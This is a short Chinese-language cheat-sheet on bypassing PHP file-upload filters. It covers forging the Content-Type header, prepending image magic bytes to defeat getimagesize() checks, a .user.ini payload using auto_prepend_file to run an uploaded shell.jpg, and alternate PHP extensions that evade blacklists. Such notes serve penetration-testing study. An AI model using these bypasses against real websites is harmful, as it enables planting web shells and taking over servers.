文件格式修改绕过
Content-Type的值修改改为:
image/png
文件幻术头绕过
图像相关的信息检测常用getimagesize( )函数。每种类型的图片内容最开头会有一个标志性 的头部,这个头部被称为文件幻术。
jpg对于的前面的16进制字符是
FFD8FFE000104A464946
png对应的是
89504E47
gif对应的是
474946383961
也可以直接把16进制转成字符加在包的首部
比如说利用文件幻术头绕过进行上传.user.ini文件
GIF89a
auto_prepend_file=shell.jpg
常见的PHP后缀绕过
php2, php3, php4, php5, phps, pht, phtm, phtml